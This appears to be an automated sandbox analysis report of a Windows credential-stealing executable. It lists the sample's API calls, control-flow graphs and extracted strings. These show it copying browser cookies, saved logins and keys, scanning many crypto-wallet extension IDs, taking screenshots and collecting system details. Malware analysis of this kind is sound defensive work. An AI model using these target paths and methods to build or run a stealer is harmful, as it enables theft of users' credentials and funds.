429ed2-429ed4 2637->2646 2647 429ec0 2637->2647 2638->2575 2639->2640 2642 429f13-429f23 call 42ff3c 2640->2642 2643 429f27 2640->2643 2642->2516 2655 429f25 2642->2655 2648 429f2a-429f3c call 429950 call 429944 2643->2648 2646->2636 2650 429ed6-429ee6 call 424b7b 2646->2650 2652 429ec2-429ec7 2647->2652 2648->2542 2660 429eed-429ef1 2650->2660 2652->2646 2656 429ec9-429ed0 2652->2656 2655->2648 2656->2646 2656->2652 2660->2636 2661 429ee8-429eea 2660->2661 2661->2636 2662 429eec 2661->2662 2662->2660
                                            APIs
                                            Strings
                                            • W. Europe Standard Time, xrefs: 0042A02B
                                            • W. Europe Daylight Time, xrefs: 0042A05A
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.929594713.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: _free$InformationTimeZone
                                            • String ID: W. Europe Daylight Time$W. Europe Standard Time
                                            • API String ID: 597776487-986674615
                                            • Opcode ID: 04baa45bb794c6948986b68f16345ab8c7a043a9fa62eca1b11e06e5ce84db47
                                            • Instruction ID: a6e2c3d1f052aa010b56476cffde206d69b75fc2ff59e3c17518a7db361cc370
                                            • Opcode Fuzzy Hash: 04baa45bb794c6948986b68f16345ab8c7a043a9fa62eca1b11e06e5ce84db47
                                            • Instruction Fuzzy Hash: 4FC13971B00125ABDB20DF69AC417AB7BA9EF46314F9500AFE884D7382E7388E41C75D
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • SetFilePointer.KERNELBASE(?,00000000,00000000,00000001,00000000,?,?,00000003), ref: 00413AA6
                                            • SetFilePointer.KERNELBASE(?,00000000,00000000,00000000,?,?,00000003), ref: 00413ACF
                                            • GetLocalTime.KERNEL32(?,?,00000003), ref: 00413AFA
                                            • SystemTimeToFileTime.KERNEL32(?,?,?,00000003), ref: 00413B0A
                                            • FileTimeToSystemTime.KERNEL32(?,?,?,00000003), ref: 00413B2A
                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00413B4C
                                              • Part of subcall function 00413670: GetFileInformationByHandle.KERNEL32(?,?,?,00000003,73BCFBD0,00000073), ref: 00413683
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.929594713.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: FileTime$PointerSystem$HandleInformationLocalUnothrow_t@std@@@__ehfuncinfo$??2@
                                            • String ID:
                                            • API String ID: 582742055-0
                                            • Opcode ID: 8819b5bcf35159362758cb872c541eb4aca84d5add6a01dfd52ddbed9aab13e9
                                            • Instruction ID: bd5cdae4d62bf1fec06762cf1ca3d2355f13057f58290dad406622aaf5667070
                                            • Opcode Fuzzy Hash: 8819b5bcf35159362758cb872c541eb4aca84d5add6a01dfd52ddbed9aab13e9
                                            • Instruction Fuzzy Hash: A2413D72604B409FD324CF29C845B6BB7E4FB88314F044A2EE5A6C6790E779E509CB55
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • FindFirstFileW.KERNEL32(?,00433978,?,00000000,00000000,?,00433978,00000000,00403626,00433978,00433978,73B76490,?), ref: 00402842
                                            • FindNextFileW.KERNELBASE(00000000,?,?,?,?,?), ref: 0040290F
                                            • FindClose.KERNEL32(00000000), ref: 0040291E
                                            Strings
                                            • ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz, xrefs: 00402A58
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.929594713.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Find$File$CloseFirstNext
                                            • String ID: ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz
                                            • API String ID: 3541575487-222967699
                                            • Opcode ID: d4fe2fd62c51d1cfa657c0d98cde52d800ef80c1e585bdbcfd8e45af17529103
                                            • Instruction ID: ef27d2c0634b057d06981e62a263eb777d22113fc9cea62dc4a2f1427e5a6a9d
                                            • Opcode Fuzzy Hash: d4fe2fd62c51d1cfa657c0d98cde52d800ef80c1e585bdbcfd8e45af17529103
                                            • Instruction Fuzzy Hash: 6CF1D371E102099FDF14DF68C989B9EBBB5FF49304F10822EE405B7281D779AA44CB95
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • WriteFile.KERNEL32(00000003,?,00000001,?,00000000,00000003,?,00000000,004133C6), ref: 00413A18
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.929594713.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: FileWrite
                                            • String ID:
                                            • API String ID: 3934441357-0
                                            • Opcode ID: fc53cdaea635f3424e5772aeb6b765612b05f65a2cb680dd14ff37f20f725988
                                            • Instruction ID: 34d7fa4072abc1ae148679c9a7964203ed4a67b4252bedcc4d41cc25f711eb5a
                                            • Opcode Fuzzy Hash: fc53cdaea635f3424e5772aeb6b765612b05f65a2cb680dd14ff37f20f725988
                                            • Instruction Fuzzy Hash: 6841DCB1611B018BC764DF2AEA44A67F7E9FB85311B44492FE486C3A00D778F948CB64
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.929594713.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID: f!@
                                            • API String ID: 0-1230519027
                                            • Opcode ID: 3f8dca354f116df7a702222f70d90a560a883af25f0c92192cb6d1e2e9c865f6
                                            • Instruction ID: eb7b40cde68853410a4a79adcc2e0ffbcb0bbde1314f21ffe1a320029a4f48b4
                                            • Opcode Fuzzy Hash: 3f8dca354f116df7a702222f70d90a560a883af25f0c92192cb6d1e2e9c865f6
                                            • Instruction Fuzzy Hash: F261597064030556DB28AA6A88817FFB399EF81B04F14042FE592DB3C0D76D9DC687DE
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Strings
                                            • RQv, xrefs: 004073FA
                                            • }, xrefs: 00407669
                                            • RQZ, xrefs: 00408216
                                            • Ms, xrefs: 004080FE
                                            • RQ`, xrefs: 00407D10
                                            • RQ+, xrefs: 00408045
                                            • bl, xrefs: 004085D9
                                            • [z, xrefs: 004079F0
                                            • |, xrefs: 0040754E
                                            • \Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih, xrefs: 00407A07
                                            • RQA, xrefs: 0040772F
                                            • (chrome default), xrefs: 00406941
                                            • zt, xrefs: 00407FD1
                                            • \Local Extension Settings\mnojpmjdmbbfmejpflffifhffcmidifd, xrefs: 004072F9
                                            • \Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi, xrefs: 004077AD
                                            • \Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec, xrefs: 00406ABE
                                            • \Local Extension Settings\aeachknmefphepccionboohckonoeemg, xrefs: 00408242
                                            • ,y, xrefs: 00407C6F
                                            • Yz, xrefs: 00407B42
                                            • RQI, xrefs: 00407527
                                            • RQX, xrefs: 00407F18
                                            • \Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig, xrefs: 00407EBB
                                            • \Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln, xrefs: 00407426
                                            • 9x, xrefs: 00407A02
                                            • +q, xrefs: 00408110
                                            • RQ-, xrefs: 00408343
                                            • \Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad, xrefs: 0040709F
                                            • 7m, xrefs: 004085B4
                                            • h6D, xrefs: 004085A7
                                            • RQ, xrefs: 00407781
                                            • RQ, xrefs: 00407E8F
                                            • RQ3, xrefs: 00407E3D
                                            • \Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp, xrefs: 004071CC
                                            • Ks, xrefs: 00408250
                                            • RQ, xrefs: 00407989
                                            • \Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid, xrefs: 00406E45
                                            • RQh, xrefs: 00407B08
                                            • Xr, xrefs: 00407FE3
                                            • RQ, xrefs: 00408470
                                            • \Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc, xrefs: 00406F72
                                            • r, xrefs: 0040822B
                                            • xt, xrefs: 00408123
                                            • \_Files\_Wallet\Metamask , xrefs: 004085B9
                                            • fy, xrefs: 004078D5
                                            • \Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj, xrefs: 00407D8E
                                            • \Local Extension Settings\cgeeodpfagjceefieflmdfphplkenlfk, xrefs: 0040836F
                                            • 3, xrefs: 00408634
                                            • \Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp, xrefs: 00407FE8
                                            • %Temp%\, xrefs: 004085AC
                                            • \Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne, xrefs: 00407680
                                            • \Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj, xrefs: 004078DA
                                            • \Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb, xrefs: 00406BEB
                                            • RQ, xrefs: 00407483
                                            • \Local Extension Settings\pdadjkfkgcafgbceimcpbkalnfnepbnk, xrefs: 0040849C
                                            • \Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec, xrefs: 00406D18
                                            • \Local Extension Settings\fnnegphlobjdpkhecapkijjdkgcjhkib, xrefs: 00408115
                                            • \Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn, xrefs: 0040698B
                                            • \Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm, xrefs: 00407C61
                                            • RQ9, xrefs: 00407937
                                            • \Local Extension Settings\fhilaheimglignddkjgofkcbgekhenbh, xrefs: 00407B34
                                            • \Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac, xrefs: 00407553
                                            • RQf, xrefs: 0040780A
                                            • RQn, xrefs: 00407602
                                            • }, xrefs: 004077BB
                                            • .y, xrefs: 00407B1D
                                            • RQ;, xrefs: 00407C35
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.929594713.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID: %Temp%\$(chrome default)$3$RQ$RQ+$RQ-$RQ3$RQ9$RQ;$RQA$RQI$RQX$RQZ$RQ`$RQf$RQh$RQn$RQv$RQ$RQ$RQ$RQ$\Local Extension Settings\aeachknmefphepccionboohckonoeemg$\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc$\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp$\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih$\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac$\Local Extension Settings\cgeeodpfagjceefieflmdfphplkenlfk$\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne$\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb$\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp$\Local Extension Settings\fhilaheimglignddkjgofkcbgekhenbh$\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi$\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec$\Local Extension Settings\fnnegphlobjdpkhecapkijjdkgcjhkib$\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad$\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln$\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec$\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid$\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj$\Local Extension Settings\mnojpmjdmbbfmejpflffifhffcmidifd$\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj$\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn$\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig$\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm$\Local Extension Settings\pdadjkfkgcafgbceimcpbkalnfnepbnk$\_Files\_Wallet\Metamask $h6D$ r$+q$,y$.y$7m$9x$Ks$Ms$Xr$Yz$[z$bl$fy$xt$zt$|$}$}
                                            • API String ID: 0-453211397
                                            • Opcode ID: 9a7fb3172e926b764877f69e056f2ba19fe8c7ff58807aec51e2ba6b61d55b05
                                            • Instruction ID: b188557e62a463b6ddac4be2a91966895fdbcbf4d6a7cae8ad2a4a706d4db8c5
                                            • Opcode Fuzzy Hash: 9a7fb3172e926b764877f69e056f2ba19fe8c7ff58807aec51e2ba6b61d55b05
                                            • Instruction Fuzzy Hash: A5131671E101489BDB08DB68DE89BDD7772AF85308F20816DE400B72E5DB7DAB84CB59
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 1265 401540-4015ba call 433060 ExpandEnvironmentStringsW call 402100 call 401220 1272 401e70-401e80 1265->1272 1273 4015c0-40162e call 402100 * 3 1265->1273 1273->1272 1280 401634-401655 CreateFileW 1273->1280 1280->1272 1281 40165b-40166c CloseHandle 1280->1281 1281->1272 1282 401672-40168d CreateFileW 1281->1282 1282->1272 1283 401693-40169e CloseHandle 1282->1283 1283->1272 1284 4016a4-4016bf CreateFileW 1283->1284 1284->1272 1285 4016c5-401722 CloseHandle 1284->1285 1286 401810-401b55 call 402120 * 4 call 41d0df call 402100 call 41d0df call 402100 call 41d0df call 402100 call 41d0df call 402100 call 41d0df call 402100 call 41d0df call 402100 call 41d0df call 402100 call 41d0df call 402100 call 41d1ab 1285->1286 1287 401728 1285->1287 1360 401ba2-401bba call 41d1ab 1286->1360 1361 401b57-401b9a CopyFileW * 3 call 41ce07 call 419cab 1286->1361 1287->1286 1289 4017d4-401803 call 401fd0 * 3 1287->1289 1290 401768-40179c call 401fd0 * 3 1287->1290 1291 40179e-4017d2 call 401fd0 * 3 1287->1291 1292 40172f-401763 call 401fd0 * 3 1287->1292 1323 401808-40180b call 401fd0 1289->1323 1290->1323 1291->1323 1292->1323 1323->1286 1367 401c07-401c0d 1360->1367 1368 401bbc-401bff CopyFileW * 3 call 41ce07 call 419cab 1360->1368 1369 401b9f 1361->1369 1371 401c44-401c64 1367->1371 1372 401c0f-401c24 1367->1372 1392 401c04 1368->1392 1369->1360 1375 401c66-401c7b 1371->1375 1376 401c9b-401cc1 1371->1376 1373 401c26-401c34 1372->1373 1374 401c3a-401c41 call 416377 1372->1374 1373->1374 1378 401e81-401e86 call 41d399 1373->1378 1374->1371 1380 401c91-401c98 call 416377 1375->1380 1381 401c7d-401c8b 1375->1381 1382 401cc3-401cd8 1376->1382 1383 401cf8-401d1e 1376->1383 1380->1376 1381->1378 1381->1380 1390 401cda-401ce8 1382->1390 1391 401cee-401cf5 call 416377 1382->1391 1386 401d20-401d35 1383->1386 1387 401d55-401d78 1383->1387 1394 401d37-401d45 1386->1394 1395 401d4b-401d52 call 416377 1386->1395 1396 401da6-401dbe 1387->1396 1397 401d7a-401d86 1387->1397 1390->1378 1390->1391 1391->1383 1392->1367 1394->1378 1394->1395 1395->1387 1403 401dc0-401dcc 1396->1403 1404 401dec-401e04 1396->1404 1401 401d88-401d96 1397->1401 1402 401d9c-401da3 call 416377 1397->1402 1401->1378 1401->1402 1402->1396 1410 401de2-401de9 call 416377 1403->1410 1411 401dce-401ddc 1403->1411 1406 401e06-401e12 1404->1406 1407 401e2e-401e46 1404->1407 1413 401e24-401e2b call 416377 1406->1413 1414 401e14-401e22 1406->1414 1407->1272 1415 401e48-401e54 1407->1415 1410->1404 1411->1378 1411->1410 1413->1407 1414->1378 1414->1413 1419 401e66-401e6d call 416377 1415->1419 1420 401e56-401e64 1415->1420 1419->1272 1420->1378 1420->1419
                                            APIs
                                            • ExpandEnvironmentStringsW.KERNEL32(?,?,00000208,?,?,?,?,004338F1,000000FF), ref: 00401575
                                              • Part of subcall function 00401220: GetFileAttributesW.KERNEL32(?), ref: 00401234
                                              • Part of subcall function 00401220: CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00401250
                                              • Part of subcall function 00401220: GetFileSizeEx.KERNEL32(00000000,?), ref: 00401267
                                              • Part of subcall function 00401220: CreateFileMappingW.KERNELBASE(00000000,00000000,00000002,00000000,00000000,00000000), ref: 0040128E
                                              • Part of subcall function 00401220: MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000), ref: 004012A4
                                              • Part of subcall function 00401220: CloseHandle.KERNEL32(00000000), ref: 004012B5
                                              • Part of subcall function 00401220: CloseHandle.KERNEL32(00000000), ref: 004012B8
                                            • CreateFileW.KERNEL32(00000000,00000080,00000000,00000000,00000003,00000000,00000000), ref: 00401650
                                            • CloseHandle.KERNEL32(00000000), ref: 00401662
                                            • CreateFileW.KERNEL32(00000000,00000080,00000000,00000000,00000003,00000000,00000000), ref: 00401688
                                            • CloseHandle.KERNEL32(00000000), ref: 00401694
                                            • CreateFileW.KERNEL32(00000000,00000080,00000000,00000000,00000003,00000000,00000000), ref: 004016BA
                                            • CloseHandle.KERNEL32(00000000), ref: 004016C6
                                            • CopyFileW.KERNEL32(?,?,00000000), ref: 00401B67
                                            • CopyFileW.KERNEL32(?,?,00000000), ref: 00401B79
                                            • CopyFileW.KERNEL32(?,?,00000000), ref: 00401B8B
                                            • CopyFileW.KERNEL32(?,?,00000000), ref: 00401BCC
                                            • CopyFileW.KERNEL32(?,?,00000000), ref: 00401BDE
                                            • CopyFileW.KERNEL32(?,?,00000000), ref: 00401BF0
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.929594713.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: File$Copy$CloseCreateHandle$AttributesEnvironmentExpandMappingSizeStringsView
                                            • String ID: %wS\%wS\Cookies$%wS\%wS\Login Data$%wS\%wS\Web Data$%wS\%wS\_Files\%wS.bin$%wS\%wS\_Files\%wS.db$%wS\%wS\files_\%wS.bin$%wS\%wS\files_\%wS.db$%wS\Local State$%wS\Opera Stable\Local State$Temp$_Brave\default_cookies$_Brave\default_key$_Brave\default_logins$_Brave\default_webdata$_Chrome\default_cookies$_Chrome\default_key$_Chrome\default_logins$_Chrome\default_webdata$_Chrome\profile1_cookies$_Chrome\profile1_key$_Chrome\profile1_logins$_Chrome\profile1_webdata$_Opera\default_cookies$_Opera\default_key$_Opera\default_logins$_Opera\default_webdata$ab+
                                            • API String ID: 1971429607-778859644
                                            • Opcode ID: 6c9ad9dfcb2d7f38408d844fd0ed0bc9bf4455e832db2eab4f0744a21cc58483
                                            • Instruction ID: 1fa3b4276e83f75601e3db087ca9a903e0bcf12c6bd16eb10e7a476d17db617b
                                            • Opcode Fuzzy Hash: 6c9ad9dfcb2d7f38408d844fd0ed0bc9bf4455e832db2eab4f0744a21cc58483
                                            • Instruction Fuzzy Hash: 3932E5B1E00208ABEB24DB55CC86FEE7379EB04704F50416AF519B71D1DBB8AA84CF58
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 1477 40ad8f-40aed7 ExpandEnvironmentStringsW call 40f2f0 call 40f5a0 ExpandEnvironmentStringsW 1487 40aed9-40aeee 1477->1487 1488 40af0e-40b009 GetDesktopWindow GetWindowRect GetWindowDC GetDeviceCaps CreateCompatibleDC CreateDIBSection 1477->1488 1489 40aef0-40aefe 1487->1489 1490 40af04-40af0b call 416377 1487->1490 1496 40b00b-40b016 DeleteDC * 2 GdiplusShutdown 1488->1496 1497 40b01c-40b071 SaveDC SelectObject BitBlt RestoreDC DeleteDC * 2 GdipAlloc 1488->1497 1489->1490 1491 40b1ff-40b204 call 41d399 1489->1491 1490->1488 1496->1497 1499 40b073-40b098 GdipCreateBitmapFromHBITMAP 1497->1499 1500 40b09a 1497->1500 1501 40b0a1-40b0f7 GdipGetImageEncodersSize 1499->1501 1500->1501 1502 40b178-40b19b GdipSaveImageToFile 1501->1502 1503 40b0f9-40b109 call 41d3ea 1501->1503 1505 40b1a0-40b1e2 DeleteObject GdiplusShutdown CopyFileW 1502->1505 1506 40b19d 1502->1506 1503->1502 1508 40b10b-40b11d GdipGetImageEncoders 1503->1508 1506->1505 1510 40b16f 1508->1510 1511 40b11f 1508->1511 1512 40b170-40b175 call 41d1c2 1510->1512 1513 40b122-40b129 1511->1513 1512->1502 1515 40b130-40b136 1513->1515 1517 40b156-40b158 1515->1517 1518 40b138-40b13b 1515->1518 1521 40b15b-40b15d 1517->1521 1519 40b152-40b154 1518->1519 1520 40b13d-40b145 1518->1520 1519->1521 1520->1517 1522 40b147-40b150 1520->1522 1523 40b1e3-40b1f5 1521->1523 1524 40b163-40b16a 1521->1524 1522->1515 1522->1519 1523->1512 1524->1513 1525 40b16c 1524->1525 1525->1510
                                            APIs
                                            • ExpandEnvironmentStringsW.KERNEL32(00000000,?,00000208,00000000,73AFE730), ref: 0040ADA4
                                            • ExpandEnvironmentStringsW.KERNEL32(00000000,?,00000208), ref: 0040AE7E
                                            • GetDesktopWindow.USER32(?,?,00000000), ref: 0040AF34
                                            • GetWindowRect.USER32 ref: 0040AF47
                                            • GetWindowDC.USER32(00000000), ref: 0040AF4E
                                            • GetDeviceCaps.GDI32(00000000,0000000C), ref: 0040AF6E
                                            • CreateCompatibleDC.GDI32(00000000), ref: 0040AF77
                                            • CreateDIBSection.GDI32(?,?,00000001,?,00000000,00000000), ref: 0040AFF8
                                            • DeleteDC.GDI32(00000000), ref: 0040B00C
                                            • DeleteDC.GDI32(?), ref: 0040B011
                                            • GdiplusShutdown.GDIPLUS(?), ref: 0040B016
                                            • SaveDC.GDI32(00000000), ref: 0040B01D
                                            • SelectObject.GDI32(00000000,?), ref: 0040B029
                                            • BitBlt.GDI32(00000000,00000000,00000000,?,?,?,00000000,00000000,00CC0020), ref: 0040B046
                                            • RestoreDC.GDI32(00000000,00000000), ref: 0040B04E
                                            • DeleteDC.GDI32(00000000), ref: 0040B05B
                                            • DeleteDC.GDI32(?), ref: 0040B060
                                            • GdipAlloc.GDIPLUS(00000010), ref: 0040B064
                                            • GdipCreateBitmapFromHBITMAP.GDIPLUS(?,00000000,?), ref: 0040B089
                                            • GdipGetImageEncodersSize.GDIPLUS(?,?), ref: 0040B0EC
                                            • GdipGetImageEncoders.GDIPLUS(00000000,00000000,00000000), ref: 0040B112
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.929594713.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: DeleteGdip$CreateWindow$EncodersEnvironmentExpandImageStrings$AllocBitmapCapsCompatibleDesktopDeviceFromGdiplusObjectRectRestoreSaveSectionSelectShutdownSize
                                            • String ID: %Temp%\$\files_\screenshot.jpg$image/jpeg
                                            • API String ID: 2763447572-171859710
                                            • Opcode ID: 510f22d190e77b2656e4dba0ddc45a63b4a3016046c0887c02990e7d4ad3c330
                                            • Instruction ID: d8e50c588ea01944bb44ef309635bae0b9a46b09829a39c395f9584097d9e9ea
                                            • Opcode Fuzzy Hash: 510f22d190e77b2656e4dba0ddc45a63b4a3016046c0887c02990e7d4ad3c330
                                            • Instruction Fuzzy Hash: 90C19C71D002199BDB10DFA4CD89BAEBBB5FF48300F10416AE509B7290DB799A81CF99
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 1714 402e20-402ea6 call 40f0f0 call 40f2f0 call 40f240 1721 402ea8 1714->1721 1722 402eaa-402ec3 ExpandEnvironmentStringsW 1714->1722 1721->1722 1723 402ec5-402ed7 1722->1723 1724 402ef7-402f11 1722->1724 1725 402ed9-402ee7 1723->1725 1726 402eed-402ef4 call 416377 1723->1726 1727 402f13-402f25 1724->1727 1728 402f45-402f5a RegOpenKeyExW 1724->1728 1725->1726 1733 4030f0 call 41d399 1725->1733 1726->1724 1729 402f27-402f35 1727->1729 1730 402f3b-402f42 call 416377 1727->1730 1731 402f60-402f85 RegEnumKeyExW 1728->1731 1732 4030a5 1728->1732 1729->1730 1729->1733 1730->1728 1737 402f8b 1731->1737 1738 40309c-4030a3 RegCloseKey 1731->1738 1739 4030a7-4030ad 1732->1739 1742 4030f5-4030fa call 41d399 1733->1742 1743 402f91-402f93 1737->1743 1738->1739 1744 4030dd-4030ef 1739->1744 1745 4030af-4030c1 1739->1745 1743->1732 1747 402f99-402fb1 call 41d1ab 1743->1747 1748 4030d3-4030da call 416377 1745->1748 1749 4030c3-4030d1 1745->1749 1755 402fb7-402fd4 RegOpenKeyExW 1747->1755 1756 40306e 1747->1756 1748->1744 1749->1742 1749->1748 1755->1732 1758 402fda-402ffe RegQueryValueExW 1755->1758 1757 403074-403096 RegEnumKeyExW 1756->1757 1757->1738 1757->1743 1759 403000-403012 call 402570 1758->1759 1760 403015-403039 RegQueryValueExW 1758->1760 1759->1760 1761 403050-403051 call 419cab 1760->1761 1762 40303b-40304d call 402570 1760->1762 1768 403056-40306c RegCloseKey 1761->1768 1762->1761 1768->1757
                                            APIs
                                            • ExpandEnvironmentStringsW.KERNEL32(00000000,?,00000208), ref: 00402EB7
                                            • RegOpenKeyExW.KERNEL32(?,?,00000000,00020119,?), ref: 00402F52
                                            • RegEnumKeyExW.KERNEL32 ref: 00402F74
                                            • RegOpenKeyExW.KERNEL32(?,?,00000000,00020119,?,00020119,?), ref: 00402FCC
                                            • RegQueryValueExW.KERNEL32(?,DisplayName,00000000,?,?,?), ref: 00402FFA
                                            • RegQueryValueExW.KERNEL32(?,DisplayVersion,00000000,?,?,?), ref: 00403035
                                            • RegCloseKey.ADVAPI32(?), ref: 00403062
                                            • RegEnumKeyExW.KERNEL32 ref: 0040308B
                                            • RegCloseKey.KERNEL32(?,?,?,00000000,00020119,?), ref: 0040309F
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.929594713.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: CloseEnumOpenQueryValue$EnvironmentExpandStrings
                                            • String ID: [ %wS ]$%Temp%\$%wS $DisplayName$DisplayVersion$\_Files\_Information.txt$a+,ccs=UTF-16LE
                                            • API String ID: 3180806605-3129064799
                                            • Opcode ID: eaaa65728a113665310eef6b36260f63c9922fdd03313e79a1d1aa83e018b5ed
                                            • Instruction ID: 8a04d3a951964e5eee5b955ef251e15adcbcf34c8aaab6d5d1baedac81cc999c
                                            • Opcode Fuzzy Hash: eaaa65728a113665310eef6b36260f63c9922fdd03313e79a1d1aa83e018b5ed
                                            • Instruction Fuzzy Hash: DB71E271A00108ABEB14DB60DD8AFEEB77CEB45304F10413AF514F72D5DB79AA448BA9
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Control-flow Graph

                                            APIs
                                            • RegQueryValueExW.KERNEL32(?,ProductName,00000000,00000000,?,?), ref: 0040AAA9
                                            • RegCloseKey.KERNEL32(?,?,73BCF9C0,00000000), ref: 0040AAB4
                                            • RegOpenKeyExW.KERNEL32(80000002,HARDWARE\DESCRIPTION\System\CentralProcessor\0,00000000,00020119,?,?,?,?,?,73BCF9C0,00000000), ref: 0040AAE8
                                            • RegQueryValueExW.KERNEL32(?,ProcessorNameString,00000000,00000000,?,?), ref: 0040AB09
                                            • RegCloseKey.ADVAPI32(?,?,?,?,?,73BCF9C0,00000000), ref: 0040AB0E
                                            • GetUserNameW.ADVAPI32(?,?), ref: 0040AB22
                                            • ExpandEnvironmentStringsW.KERNEL32(00000000,?,00000208,?,?,?,?,?,73BCF9C0,00000000), ref: 0040ABBD
                                            • CreateDirectoryW.KERNEL32(?,00000000,?,?,?,?,73BCF9C0,00000000), ref: 0040AC06
                                            • Sleep.KERNEL32(?,?,?,?,?,73BCF9C0,00000000), ref: 0040AC43
                                            • GetFileAttributesW.KERNEL32(00000000), ref: 0040AC5A
                                            • RemoveDirectoryW.KERNEL32(00000000), ref: 0040AC72
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.929594713.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: CloseDirectoryQueryValue$AttributesCreateEnvironmentExpandFileNameOpenRemoveSleepStringsUser
                                            • String ID: %Temp%\$HARDWARE\DESCRIPTION\System\CentralProcessor\0$ProcessorNameString$ProductName
                                            • API String ID: 3957966660-2761025811
